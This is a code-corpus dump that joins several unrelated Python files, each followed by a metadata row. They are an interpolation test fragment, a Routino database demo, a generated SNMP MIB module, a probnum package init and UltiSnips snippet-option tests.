https://github.com/sbarratt/torch_interpolations/blob/master/tests/test_grid_interpolator.py
"""
points = [tl.arange(-0.5, 2.5, 0.1) * 1.0, tl.arange(-0.5, 2.5, 0.2) * 1.0]
values = (
hypney.utils.eagerpy.sin(points[0])[:, None]
+ 2 * hypney.utils.eagerpy.cos(points[1])[None, :]
+ hypney.utils.eagerpy.sin(5 * points[0][:, None] @ points[1][None, :])
)
X, Y = ep.meshgrid(tl.arange(-0.5, 2, 0.1), tl.arange(-0.5, 2, 0.1))
points_to_interp = ep.stack([X.flatten(), Y.flatten()]).T
gi = hypney.utils.interpolation.RegularGridInterpolator(points, values)
fx = gi(points_to_interp)
rgi = RegularGridInterpolator(
[p.numpy() for p in points], [x.numpy() for x in values], bounds_error=False
)
rfx = rgi(points_to_interp.numpy())
np.testing.assert_allclose(rfx, fx.numpy(), atol=1e-6)
# TODO: port derivative test to eagerpy
# note that points_to_interp has to be transposed
#
# def test_regular_grid_interpolator_derivative():
# points = [torch.arange(-.5, 2.5, .5) * 1., torch.arange(-.5, 2.5, .5) * 1.]
# values = torch.sin(points[0])[:, None] + 2 * torch.cos(points[1])[None, :] + torch.sin(5 * points[0][:, None] @ points[1][None, :])
# values.requires_grad_(True)
#
# X, Y = np.meshgrid(np.arange(-.5, 2, .19), np.arange(-.5, 2, .19))
# points_to_interp = [torch.from_numpy(
# X.flatten()).float(), torch.from_numpy(Y.flatten()).float()]
#
# def f(values):
# return torch_interpolations.RegularGridInterpolator(
# points, values)(points_to_interp)
#
# torch.autograd.gradcheck(f, (values,), eps=1e-5, atol=1e-1, rtol=1e-1)
def test_interpolator_builder():
itp = hypney.utils.interpolation.InterpolatorBuilder([(-1, 0, 1)])
def scalar_f(z):
return z[0]
z = ep.astensor(np.array([1, 0, -1, 0, 1, 1, -1]))
scalar_itp = itp.make_interpolator(scalar_f)
np.testing.assert_array_equal(scalar_itp(z).numpy(), z.numpy())
def matrix_f(z):
return ep.astensor(np.ones((2, 2)) * z[0])
matrix_itp = itp.make_interpolator(matrix_f)
np.testing.assert_array_equal(
matrix_itp(z).numpy(), z[:, None, None].numpy() * np.ones((1, 2, 2))
)
# What happened here? Does the test not make sense or did the API change?
# np.testing.assert_array_equal(
# matrix_itp(ep.numpy.array([0, 0, 0])).numpy(),
# np.ones((2, 2)))
| 33.564103 | 137 | 0.632544 | 394 | 2,618 | 4.081218 | 0.266497 | 0.00995 | 0.052239 | 0.024876 | 0.214552 | 0.143657 | 0.126866 | 0.032338 | 0 | 0 | 0 | 0.040566 | 0.190222 | 2,618 | 77 | 138 | 34 | 0.717925 | 0.399924 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012987 | 0.088235 | 1 | 0.117647 | false | 0 | 0.117647 | 0.058824 | 0.294118 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fe12a816ae34998a3fcf2329f909ed39bda660d | 8,451 | py | Python | python/database.py | bvmeggelen/routino | b6bcc47be6ba4a90353a5b140ca9996aaa17d2b8 | [
"X11",
"MIT"
] | 1 | 2016-02-12T20:26:31.000Z | 2016-02-12T20:26:31.000Z | python/database.py | bvmeggelen/routino | b6bcc47be6ba4a90353a5b140ca9996aaa17d2b8 | [
"X11",
"MIT"
] | 2 | 2019-01-16T10:00:19.000Z | 2019-02-03T10:53:32.000Z | python/database.py | bvmeggelen/routino | b6bcc47be6ba4a90353a5b140ca9996aaa17d2b8 | [
"X11",
"MIT"
] | null | null | null | #!/usr/bin/python3
##########################################
# Routino database access from Python.
#
# Part of the Routino routing software.
##########################################
# This file Copyright 2018 Andrew M. Bishop
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
##########################################
import routino.database
# Database, access all attributes
database = routino.database.LoadDatabase("../../src/test/fat", "turns")
if database is None:
database = routino.database.LoadDatabase("../src/test/fat", "turns")
if database is None:
print("Failed to load database")
exit(1)
print(database)
database_attrs = ['nnodes', 'nsegments', 'nways', 'nrelations']
for attr in database_attrs:
print(" Attribute: " + attr + " =", getattr(database, attr))
print("")
# A single node, access all attributes and all functions
node=database.GetNode(0)
print("1st node =", node)
node_attrs = ['id', 'firstsegment', 'latitude', 'longitude', 'allow', 'flags']
node_infos = ['', '', 'degrees', 'degrees', '[note 1]', '[note 2]']
for attr,info in zip(node_attrs,node_infos):
print(" Attribute: " + attr + " =", getattr(node, attr), info)
segments = node.Segments()
print(" Function: " + "Segments()" + " = [" + ", ".join([str(segments[x]) for x in range(len(segments))]) + "]")
print("")
# A single segment, access all attributes and all functions
segment=database.GetSegment(0)
print("1st segment =", segment)
segment_attrs = ['id', 'node1', 'node2', 'next2', 'way', 'distance', 'flags']
segment_infos = ['', '', '', '', '', 'km', '[note 3]']
for attr,info in zip(segment_attrs,segment_infos):
print(" Attribute: " + attr + " =", getattr(segment, attr), info)
print(" Function: " + "Node1()" + " = " + str(segment.Node1()))
print(" Function: " + "Node2()" + " = " + str(segment.Node2()))
print(" Function: " + "Way()" + " = " + str(segment.Way()))
print("")
# A single way, access all attributes and all functions
way=database.GetWay(0)
print("1st way =", way)
way_attrs = ['id', 'name', 'allow', 'type', 'props', 'speed', 'weight', 'height', 'width', 'length']
way_infos = ['', '', '[note 1]', '[note 4]', '[note 5]', 'km/hr [note 6]', 'tonnes [note 6]', 'metres [note 6]', 'metres [note 6]', 'metres [note 6]']
for attr,info in zip(way_attrs,way_infos):
print(" Attribute: " + attr + " =", getattr(way, attr), info)
print("")
# A single relation, access all attributes and all functions
relation=database.GetRelation(0)
print("1st relation =", relation)
relation_attrs = ['id', 'from_seg', 'via_node', 'to_seg', 'from_way', 'to_way', 'from_node', 'to_node', 'except_transport']
relation_infos = ['', '', '', '', '', '', '', '', '[note 7]']
for attr,info in zip(relation_attrs,relation_infos):
print(" Attribute: " + attr + " =", getattr(relation, attr), info)
print(" Function: " + "FromSegment()" + " = " + str(relation.FromSegment()))
print(" Function: " + "ViaNode()" + " = " + str(relation.ViaNode()))
print(" Function: " + "ToSegment()" + " = " + str(relation.ToSegment()))
print(" Function: " + "FromWay()" + " = " + str(relation.FromWay()))
print(" Function: " + "ToWay()" + " = " + str(relation.ToWay()))
print(" Function: " + "FromNode()" + " = " + str(relation.FromNode()))
print(" Function: " + "ToNode()" + " = " + str(relation.ToNode()))
print("")
# The list of nodes as a list and an iterable (just the first 4)
nodes=database.Nodes()
print("len(database.Nodes()) = " + str(len(nodes)))
print("database.Nodes() = [" + ", ".join([str(nodes[x]) for x in range(4)]) + ", ...]")
for node in nodes:
if node.id == 4:
break
print(node)
print("")
# The list of segments as a list and an iterable (just the first 4)
segments=database.Segments()
print("len(database.Segments()) = " + str(len(segments)))
print("database.Segments() = [" + ", ".join([str(segments[x]) for x in range(4)]) + ", ...]")
for segment in segments:
if segment.id == 4:
break
print(segment)
print("")
# The list of ways as a list and an iterable (just the first 4)
ways=database.Ways()
print("len(database.Ways()) = " + str(len(ways)))
print("database.Ways() = [" + ", ".join([str(ways[x]) for x in range(4)]) + ", ...]")
for way in ways:
if way.id == 4:
break
print(way)
print("")
# The list of relations as a list and an iterable (just the first 4)
relations=database.Relations()
print("len(database.Relations()) = " + str(len(relations)))
print("database.Relations() = [" + ", ".join([str(relations[x]) for x in range(4)]) + ", ...]")
for relation in relations:
if relation.id == 4:
break
print(relation)
print("")
# Enumerated lists
transports_enum = ["Transports_None",
"Transports_Foot",
"Transports_Horse",
"Transports_Wheelchair",
"Transports_Bicycle",
"Transports_Moped",
"Transports_Motorcycle",
"Transports_Motorcar",
"Transports_Goods",
"Transports_HGV",
"Transports_PSV",
"Transports_ALL"]
nodeflags_enum = ["Nodeflag_Super",
"Nodeflag_U_Turn",
"Nodeflag_Mini_Roundabout",
"Nodeflag_Turn_Restrict",
"Nodeflag_Turn_Restrict2"]
segmentflags_enum = ["Segmentflag_Area",
"Segmentflag_Oneway_1to2",
"Segmentflag_Oneway_2to1",
"Segmentflag_Super",
"Segmentflag_Normal"]
properties_enum = ["Properties_None",
"Properties_Paved",
"Properties_Multilane",
"Properties_Bridge",
"Properties_Tunnel",
"Properties_FootRoute",
"Properties_BicycleRoute",
"Properties_ALL"]
highway_enum = ["Highway_Motorway",
"Highway_Trunk",
"Highway_Primary",
"Highway_Secondary",
"Highway_Tertiary",
"Highway_Unclassified",
"Highway_Residential",
"Highway_Service",
"Highway_Track",
"Highway_Cycleway",
"Highway_Path",
"Highway_Steps",
"Highway_Ferry",
"Highway_Count",
"Highway_CycleBothWays",
"Highway_OneWay",
"Highway_Roundabout",
"Highway_Area"]
def print_enum(list):
for item in list:
print(" routino.database."+item)
print("Note 1: The Node's and Way's 'allow' parameter can be the combination of these enumerated values:")
print_enum(transports_enum)
print("")
print("Note 2: The Node's 'flags' parameter can be the combination of these enumerated values:")
print_enum(nodeflags_enum)
print("")
print("Note 3: The Segment's 'flags' parameter can be the combination of these enumerated values:")
print_enum(segmentflags_enum)
print("")
print("Note 4: The Way's 'type' parameter can be one the combination of these enumerated values:")
print_enum(highway_enum)
print("")
print("Note 5: The Way's 'props' parameter can be the combination of these enumerated values:")
print_enum(properties_enum)
print("")
print("Note 6: A value of zero for a Way's speed, weight, height, width or length means that there is no limit.")
print("")
print("Note 7: The Relation's 'except_transport' parameter can be the combination of these enumerated values:")
print_enum(transports_enum)
print("")
import gc
gc.collect()
| 30.956044 | 156 | 0.587504 | 964 | 8,451 | 5.047718 | 0.254149 | 0.029388 | 0.017263 | 0.025894 | 0.254829 | 0.217016 | 0.182491 | 0.15783 | 0.140567 | 0.126182 | 0 | 0.009107 | 0.246361 | 8,451 | 272 | 157 | 31.069853 | 0.754907 | 0.153591 | 0 | 0.152866 | 0 | 0.019108 | 0.363481 | 0.03872 | 0 | 0 | 0 | 0 | 0 | 1 | 0.006369 | false | 0 | 0.012739 | 0 | 0.019108 | 0.414013 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
6fe25b4c2678c24198e66f7fedfb9fb15fdcf64a | 5,498 | py | Python | pysnmp/BAY-STACK-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 11 | 2021-02-02T16:27:16.000Z | 2021-08-31T06:22:49.000Z | pysnmp/BAY-STACK-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 75 | 2021-02-24T17:30:31.000Z | 2021-12-08T00:01:18.000Z | pysnmp/BAY-STACK-MIB.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module BAY-STACK-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/BAY-STACK-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 17:19:06 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsUnion, ConstraintsIntersection, ValueSizeConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsUnion", "ConstraintsIntersection", "ValueSizeConstraint", "ValueRangeConstraint")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
TimeTicks, MibScalar, MibTable, MibTableRow, MibTableColumn, Gauge32, Counter64, Bits, Counter32, ModuleIdentity, ObjectIdentity, IpAddress, iso, Integer32, NotificationType, MibIdentifier, Unsigned32 = mibBuilder.importSymbols("SNMPv2-SMI", "TimeTicks", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Gauge32", "Counter64", "Bits", "Counter32", "ModuleIdentity", "ObjectIdentity", "IpAddress", "iso", "Integer32", "NotificationType", "MibIdentifier", "Unsigned32")
TruthValue, TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TruthValue", "TextualConvention", "DisplayString")
bayStackMibs, = mibBuilder.importSymbols("SYNOPTICS-ROOT-MIB", "bayStackMibs")
bayStackMib = ModuleIdentity((1, 3, 6, 1, 4, 1, 45, 5, 13))
bayStackMib.setRevisions(('2013-10-11 00:00', '2012-10-02 00:00', '2009-09-28 00:00', '2007-09-04 00:00', '2005-08-22 00:00',))
if mibBuilder.loadTexts: bayStackMib.setLastUpdated('201310110000Z')
if mibBuilder.loadTexts: bayStackMib.setOrganization('Nortel Networks')
bayStackObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 45, 5, 13, 1))
bayStackConfig = MibIdentifier((1, 3, 6, 1, 4, 1, 45, 5, 13, 1, 1))
bayStackConfigExpectedStackSize = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 13, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 8))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: bayStackConfigExpectedStackSize.setStatus('current')
bayStackConfigStackErrorNotificationInterval = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 13, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 65535)).clone(60)).setUnits('Seconds').setMaxAccess("readwrite")
if mibBuilder.loadTexts: bayStackConfigStackErrorNotificationInterval.setStatus('current')
bayStackConfigStackErrorNotificationEnabled = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 13, 1, 1, 3), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: bayStackConfigStackErrorNotificationEnabled.setStatus('current')
bayStackConfigStackRebootUnitOnFailure = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 13, 1, 1, 4), TruthValue()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: bayStackConfigStackRebootUnitOnFailure.setStatus('current')
bayStackConfigStackRetryCount = MibScalar((1, 3, 6, 1, 4, 1, 45, 5, 13, 1, 1, 5), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: bayStackConfigStackRetryCount.setStatus('current')
bayStackUnitConfigTable = MibTable((1, 3, 6, 1, 4, 1, 45, 5, 13, 1, 2), )
if mibBuilder.loadTexts: bayStackUnitConfigTable.setStatus('current')
bayStackUnitConfigEntry = MibTableRow((1, 3, 6, 1, 4, 1, 45, 5, 13, 1, 2, 1), ).setIndexNames((0, "BAY-STACK-MIB", "bayStackUnitConfigIndex"))
if mibBuilder.loadTexts: bayStackUnitConfigEntry.setStatus('current')
bayStackUnitConfigIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 5, 13, 1, 2, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 8))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bayStackUnitConfigIndex.setStatus('current')
bayStackUnitConfigRearPortAdminMode = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 5, 13, 1, 2, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("standalone", 1), ("stacking", 2), ("spb", 3)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: bayStackUnitConfigRearPortAdminMode.setStatus('current')
bayStackUnitConfigRearPortOperMode = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 5, 13, 1, 2, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("standalone", 1), ("stacking", 2), ("spb", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: bayStackUnitConfigRearPortOperMode.setStatus('current')
mibBuilder.exportSymbols("BAY-STACK-MIB", bayStackMib=bayStackMib, bayStackUnitConfigIndex=bayStackUnitConfigIndex, bayStackConfigStackErrorNotificationEnabled=bayStackConfigStackErrorNotificationEnabled, PYSNMP_MODULE_ID=bayStackMib, bayStackConfigStackRetryCount=bayStackConfigStackRetryCount, bayStackConfigStackErrorNotificationInterval=bayStackConfigStackErrorNotificationInterval, bayStackUnitConfigRearPortOperMode=bayStackUnitConfigRearPortOperMode, bayStackUnitConfigEntry=bayStackUnitConfigEntry, bayStackConfigStackRebootUnitOnFailure=bayStackConfigStackRebootUnitOnFailure, bayStackObjects=bayStackObjects, bayStackUnitConfigRearPortAdminMode=bayStackUnitConfigRearPortAdminMode, bayStackConfig=bayStackConfig, bayStackUnitConfigTable=bayStackUnitConfigTable, bayStackConfigExpectedStackSize=bayStackConfigExpectedStackSize)
| 130.904762 | 836 | 0.790833 | 556 | 5,498 | 7.816547 | 0.269784 | 0.006903 | 0.008974 | 0.011965 | 0.35826 | 0.254717 | 0.230787 | 0.230787 | 0.230787 | 0.199724 | 0 | 0.071876 | 0.071299 | 5,498 | 41 | 837 | 134.097561 | 0.779279 | 0.058203 | 0 | 0 | 0 | 0 | 0.159799 | 0.012962 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.205882 | 0 | 0.205882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fe6702a87b9963548f65391cbbfe3151ca980e8 | 1,606 | py | Python | src/probnum/random_variables/__init__.py | admdev8/probnum | 792b6299bac247cf8b1b5056756f0f078855d83a | [
"MIT"
] | null | null | null | src/probnum/random_variables/__init__.py | admdev8/probnum | 792b6299bac247cf8b1b5056756f0f078855d83a | [
"MIT"
] | 2 | 2020-12-28T19:37:16.000Z | 2020-12-28T19:37:31.000Z | src/probnum/random_variables/__init__.py | admdev8/probnum | 792b6299bac247cf8b1b5056756f0f078855d83a | [
"MIT"
] | null | null | null | """
This package implements random variables. Random variables are the primary in- and
outputs of probabilistic numerical methods. A generic signature of such methods looks
like this:
.. highlight:: python
.. code-block:: python
randvar_out, info = probnum_method(problem, randvar_in, **kwargs)
"""
from ._dirac import Dirac
from ._normal import Normal
from ._random_variable import (
ContinuousRandomVariable,
DiscreteRandomVariable,
RandomVariable,
)
from ._scipy_stats import (
WrappedSciPyContinuousRandomVariable,
WrappedSciPyDiscreteRandomVariable,
WrappedSciPyRandomVariable,
)
from ._utils import asrandvar
# Public classes and functions. Order is reflected in documentation.
__all__ = [
"asrandvar",
"RandomVariable",
"DiscreteRandomVariable",
"ContinuousRandomVariable",
"Dirac",
"Normal",
"WrappedSciPyRandomVariable",
"WrappedSciPyDiscreteRandomVariable",
"WrappedSciPyContinuousRandomVariable",
]
# Set correct module paths. Corrects links and module paths in documentation.
RandomVariable.__module__ = "probnum.random_variables"
DiscreteRandomVariable.__module__ = "probnum.random_variables"
ContinuousRandomVariable.__module__ = "probnum.random_variables"
WrappedSciPyRandomVariable.__module__ = "probnum.random_variables"
WrappedSciPyDiscreteRandomVariable.__module__ = "probnum.random_variables"
WrappedSciPyContinuousRandomVariable.__module__ = "probnum.random_variables"
Dirac.__module__ = "probnum.random_variables"
Normal.__module__ = "probnum.random_variables"
asrandvar.__module__ = "probnum.random_variables"
| 30.301887 | 85 | 0.797011 | 141 | 1,606 | 8.659574 | 0.432624 | 0.135135 | 0.140049 | 0.206388 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126401 | 1,606 | 52 | 86 | 30.884615 | 0.870278 | 0.273973 | 0 | 0 | 0 | 0 | 0.3391 | 0.309689 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.151515 | 0 | 0.151515 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6fea6ea2847af9fb33f26ea132b770aa2ffca311 | 9,206 | py | Python | dot_vim/plugged/ultisnips/test/test_SnippetOptions.py | gabefgonc/san-francisco-rice-dotfiles | 60ff3539f34ecfff6d7bce895497e2a3805910d4 | [
"MIT"
] | 10 | 2020-07-21T21:59:54.000Z | 2021-07-19T11:01:47.000Z | dot_vim/plugged/ultisnips/test/test_SnippetOptions.py | gabefgonc/san-francisco-rice-dotfiles | 60ff3539f34ecfff6d7bce895497e2a3805910d4 | [
"MIT"
] | null | null | null | dot_vim/plugged/ultisnips/test/test_SnippetOptions.py | gabefgonc/san-francisco-rice-dotfiles | 60ff3539f34ecfff6d7bce895497e2a3805910d4 | [
"MIT"
] | 1 | 2021-01-30T18:17:01.000Z | 2021-01-30T18:17:01.000Z | # encoding: utf-8
from test.vim_test_case import VimTestCase as _VimTest
from test.constant import *
from test.util import running_on_windows
class SnippetOptions_OnlyExpandWhenWSInFront_Expand(_VimTest):
snippets = ("test", "Expand me!", "", "b")
keys = "test" + EX
wanted = "Expand me!"
class SnippetOptions_OnlyExpandWhenWSInFront_Expand2(_VimTest):
snippets = ("test", "Expand me!", "", "b")
keys = " test" + EX
wanted = " Expand me!"
class SnippetOptions_OnlyExpandWhenWSInFront_DontExpand(_VimTest):
snippets = ("test", "Expand me!", "", "b")
keys = "a test" + EX
wanted = "a test" + EX
class SnippetOptions_OnlyExpandWhenWSInFront_OneWithOneWO(_VimTest):
snippets = (("test", "Expand me!", "", "b"), ("test", "not at beginning", "", ""))
keys = "a test" + EX
wanted = "a not at beginning"
class SnippetOptions_OnlyExpandWhenWSInFront_OneWithOneWOChoose(_VimTest):
snippets = (("test", "Expand me!", "", "b"), ("test", "not at beginning", "", ""))
keys = " test" + EX + "1\n"
wanted = " Expand me!"
class SnippetOptions_ExpandInwordSnippets_SimpleExpand(_VimTest):
snippets = (("test", "Expand me!", "", "i"),)
keys = "atest" + EX
wanted = "aExpand me!"
class SnippetOptions_ExpandInwordSnippets_ExpandSingle(_VimTest):
snippets = (("test", "Expand me!", "", "i"),)
keys = "test" + EX
wanted = "Expand me!"
class SnippetOptions_ExpandInwordSnippetsWithOtherChars_Expand(_VimTest):
snippets = (("test", "Expand me!", "", "i"),)
keys = "$test" + EX
wanted = "$Expand me!"
class SnippetOptions_ExpandInwordSnippetsWithOtherChars_Expand2(_VimTest):
snippets = (("test", "Expand me!", "", "i"),)
keys = "-test" + EX
wanted = "-Expand me!"
class SnippetOptions_ExpandInwordSnippetsWithOtherChars_Expand3(_VimTest):
skip_if = lambda self: running_on_windows()
snippets = (("test", "Expand me!", "", "i"),)
keys = "ßßtest" + EX
wanted = "ßßExpand me!"
class _SnippetOptions_ExpandWordSnippets(_VimTest):
snippets = (("test", "Expand me!", "", "w"),)
class SnippetOptions_ExpandWordSnippets_NormalExpand(
_SnippetOptions_ExpandWordSnippets
):
keys = "test" + EX
wanted = "Expand me!"
class SnippetOptions_ExpandWordSnippets_NoExpand(_SnippetOptions_ExpandWordSnippets):
keys = "atest" + EX
wanted = "atest" + EX
class SnippetOptions_ExpandWordSnippets_ExpandSuffix(
_SnippetOptions_ExpandWordSnippets
):
keys = "a-test" + EX
wanted = "a-Expand me!"
class SnippetOptions_ExpandWordSnippets_ExpandSuffix2(
_SnippetOptions_ExpandWordSnippets
):
keys = "a(test" + EX
wanted = "a(Expand me!"
class SnippetOptions_ExpandWordSnippets_ExpandSuffix3(
_SnippetOptions_ExpandWordSnippets
):
keys = "[[test" + EX
wanted = "[[Expand me!"
class _No_Tab_Expand(_VimTest):
snippets = ("test", "\t\tExpand\tme!\t", "", "t")
class No_Tab_Expand_Simple(_No_Tab_Expand):
keys = "test" + EX
wanted = "\t\tExpand\tme!\t"
class No_Tab_Expand_Leading_Spaces(_No_Tab_Expand):
keys = " test" + EX
wanted = " \t\tExpand\tme!\t"
class No_Tab_Expand_Leading_Tabs(_No_Tab_Expand):
keys = "\ttest" + EX
wanted = "\t\t\tExpand\tme!\t"
class No_Tab_Expand_No_TS(_No_Tab_Expand):
def _extra_vim_config(self, vim_config):
vim_config.append("set sw=3")
vim_config.append("set sts=3")
keys = "test" + EX
wanted = "\t\tExpand\tme!\t"
class No_Tab_Expand_ET(_No_Tab_Expand):
def _extra_vim_config(self, vim_config):
vim_config.append("set sw=3")
vim_config.append("set expandtab")
keys = "test" + EX
wanted = "\t\tExpand\tme!\t"
class No_Tab_Expand_ET_Leading_Spaces(_No_Tab_Expand):
def _extra_vim_config(self, vim_config):
vim_config.append("set sw=3")
vim_config.append("set expandtab")
keys = " test" + EX
wanted = " \t\tExpand\tme!\t"
class No_Tab_Expand_ET_SW(_No_Tab_Expand):
def _extra_vim_config(self, vim_config):
vim_config.append("set sw=8")
vim_config.append("set expandtab")
keys = "test" + EX
wanted = "\t\tExpand\tme!\t"
class No_Tab_Expand_ET_SW_TS(_No_Tab_Expand):
def _extra_vim_config(self, vim_config):
vim_config.append("set sw=3")
vim_config.append("set sts=3")
vim_config.append("set ts=3")
vim_config.append("set expandtab")
keys = "test" + EX
wanted = "\t\tExpand\tme!\t"
class _TabExpand_RealWorld:
snippets = (
"hi",
r"""hi
`!p snip.rv="i1\n"
snip.rv += snip.mkline("i1\n")
snip.shift(1)
snip.rv += snip.mkline("i2\n")
snip.unshift(2)
snip.rv += snip.mkline("i0\n")
snip.shift(3)
snip.rv += snip.mkline("i3")`
snip.rv = repr(snip.rv)
End""",
)
class No_Tab_Expand_RealWorld(_TabExpand_RealWorld, _VimTest):
def _extra_vim_config(self, vim_config):
vim_config.append("set noexpandtab")
keys = "\t\thi" + EX
wanted = """\t\thi
\t\ti1
\t\ti1
\t\t\ti2
\ti0
\t\t\t\ti3
\t\tsnip.rv = repr(snip.rv)
\t\tEnd"""
class SnippetOptions_Regex_Expand(_VimTest):
snippets = ("(test)", "Expand me!", "", "r")
keys = "test" + EX
wanted = "Expand me!"
class SnippetOptions_Regex_WithSpace(_VimTest):
snippets = ("test ", "Expand me!", "", "r")
keys = "test " + EX
wanted = "Expand me!"
class SnippetOptions_Regex_Multiple(_VimTest):
snippets = ("(test *)+", "Expand me!", "", "r")
keys = "test test test" + EX
wanted = "Expand me!"
class _Regex_Self(_VimTest):
snippets = ("((?<=\W)|^)(\.)", "self.", "", "r")
class SnippetOptions_Regex_Self_Start(_Regex_Self):
keys = "." + EX
wanted = "self."
class SnippetOptions_Regex_Self_Space(_Regex_Self):
keys = " ." + EX
wanted = " self."
class SnippetOptions_Regex_Self_TextAfter(_Regex_Self):
keys = " .a" + EX
wanted = " .a" + EX
class SnippetOptions_Regex_Self_TextBefore(_Regex_Self):
keys = "a." + EX
wanted = "a." + EX
class SnippetOptions_Regex_PythonBlockMatch(_VimTest):
snippets = (
r"([abc]+)([def]+)",
r"""`!p m = match
snip.rv += m.group(2)
snip.rv += m.group(1)
`""",
"",
"r",
)
keys = "test cabfed" + EX
wanted = "test fedcab"
class SnippetOptions_Regex_PythonBlockNoMatch(_VimTest):
snippets = (r"cabfed", r"""`!p snip.rv = match or "No match"`""")
keys = "test cabfed" + EX
wanted = "test No match"
# Tests for Bug #691575
class SnippetOptions_Regex_SameLine_Long_End(_VimTest):
snippets = ("(test.*)", "Expand me!", "", "r")
keys = "test test abc" + EX
wanted = "Expand me!"
class SnippetOptions_Regex_SameLine_Long_Start(_VimTest):
snippets = ("(.*test)", "Expand me!", "", "r")
keys = "abc test test" + EX
wanted = "Expand me!"
class SnippetOptions_Regex_SameLine_Simple(_VimTest):
snippets = ("(test)", "Expand me!", "", "r")
keys = "abc test test" + EX
wanted = "abc test Expand me!"
class MultiWordSnippet_Simple(_VimTest):
snippets = ("test me", "Expand me!")
keys = "test me" + EX
wanted = "Expand me!"
class MultiWord_SnippetOptions_OnlyExpandWhenWSInFront_Expand(_VimTest):
snippets = ("test it", "Expand me!", "", "b")
keys = "test it" + EX
wanted = "Expand me!"
class MultiWord_SnippetOptions_OnlyExpandWhenWSInFront_Expand2(_VimTest):
snippets = ("test it", "Expand me!", "", "b")
keys = " test it" + EX
wanted = " Expand me!"
class MultiWord_SnippetOptions_OnlyExpandWhenWSInFront_DontExpand(_VimTest):
snippets = ("test it", "Expand me!", "", "b")
keys = "a test it" + EX
wanted = "a test it" + EX
class MultiWord_SnippetOptions_OnlyExpandWhenWSInFront_OneWithOneWO(_VimTest):
snippets = (
("test it", "Expand me!", "", "b"),
("test it", "not at beginning", "", ""),
)
keys = "a test it" + EX
wanted = "a not at beginning"
